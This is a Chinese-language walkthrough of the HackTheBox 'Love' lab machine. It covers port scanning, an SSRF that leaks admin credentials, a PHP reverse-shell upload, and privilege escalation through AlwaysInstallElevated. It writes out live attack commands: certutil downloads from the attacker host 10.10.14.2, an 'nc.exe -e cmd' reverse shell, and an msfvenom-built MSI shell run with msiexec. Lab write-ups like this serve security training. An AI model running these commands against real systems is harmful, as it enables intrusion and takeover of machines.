[PHP知识库]hackthebox-love（上传/windows的reverse-php-shell/ AlwaysInstallElevated）

1 扫描

迅速扫全端口，顺便浏览器打开靶机ip看看界面。写着是voting system投票界面

masscan -p1-65535,U:1-65535 10.10.10.239 --rate=1000 -e tun0

看到开了很多

masscan -p1-65535,U:1-65535 10.10.10.239 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-08-07 02:24:45 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.239                                   
Discovered open port 49667/tcp on 10.10.10.239                                 
Discovered open port 5986/tcp on 10.10.10.239                                  
Discovered open port 5040/tcp on 10.10.10.239                                  
Discovered open port 49666/tcp on 10.10.10.239                                 
Discovered open port 47001/tcp on 10.10.10.239                                 
Discovered open port 139/tcp on 10.10.10.239                                   
Discovered open port 80/tcp on 10.10.10.239                                    
Discovered open port 3306/tcp on 10.10.10.239                                  
Discovered open port 135/tcp on 10.10.10.239                                   
Discovered open port 443/tcp on 10.10.10.239                                   
Discovered open port 49668/tcp on 10.10.10.239                                 
Discovered open port 49669/tcp on 10.10.10.239                                 
Discovered open port 7680/tcp on 10.10.10.239                                  
Discovered open port 49664/tcp on 10.10.10.239                                 
Discovered open port 49665/tcp on 10.10.10.239                                 
Discovered open port 49670/tcp on 10.10.10.239                                 
Discovered open port 5985/tcp on 10.10.10.239                                  
Discovered open port 5000/tcp on 10.10.10.239            

拿nmap详细扫这些做多了靶机就知道的重要端口

 nmap -A 10.10.10.239 -p 445,5986,139,80,3306,443,5000,5985

443这里看到staging.love.htb新地址

443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

把它10.10.10.239 staging.love.htb加到你本机的/etc/hosts里再访问staging.love.htb

2 信息搜集

在刚刚进入的网站里看看。 demo有示范、样片的意思。点进去发现可以输入网址扫文件，这里可以输靶机ip地址或127.0.0.1内网多试试。发现voting system这个界面。 这个跟之前在浏览器的网站输入框直接输10.10.10.239是一样的

之前扫的端口还有很多，一个个试稀奇古怪的端口，试127.0.0.1:5000
可以看到密码admin: @LoveIsInTheAir!!!!

有了密码就要找登录框，按经验一般在/admin之类.拿dirbuster等各种目录扫描工具扫10.10.10.239.还真的找到

http://10.10.10.239/admin/

顺利进入。

找到上传php处

3 上传

在voters那里找到上传

上传著名的reverse-shell php
成功后看到图片那里没有显示，

根据经验，往往这里就是运行php处。再想是否哪里有点击图片的，放图片的目录
在目录扫描工具可见images

点到images目录
就可以看见上传的php了，点击。

本机接收，但是错误
提示uname 这个命令错误，这是linux命令，那么意思是靶机系统为win，不是linux

再换win的reverse shell php

网上有很多
我习惯用网页交互在线版这个工具

成功。
然后一套流程弹回本机，使后面操作更方便。
传nc （本机要准备好，这些步骤过去讲了太多就省略了）

certutil -urlcache -split -f http://10.10.14.2/nc.exe nc.exe

弹回，收到，拿下。

nc.exe -e cmd 10.10.14.2 1234

4 提权

传win版的winpeas进去扫https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

certutil -urlcache -split -f http://10.10.14.2/winPEAS.exe 666.exe

直接运行
发现

在这里有英文漏洞描述
简单说就是对这种AlwaysInstallElevated让没权限的可以 以最高system权限运行，因此在这里可做手脚

照着来
先生成邪恶文件msfvenom -p windows/x64/shell_reverse_tcp Lhost=10.10.14.2 LPORT=4444 -f msi > shell.msi
传入certutil -urlcache -split -f http://10.10.14.2/shell.msi shell.msi
运行msiexec /quiet /qn /i shell.msi

本机开端口，接收，拿下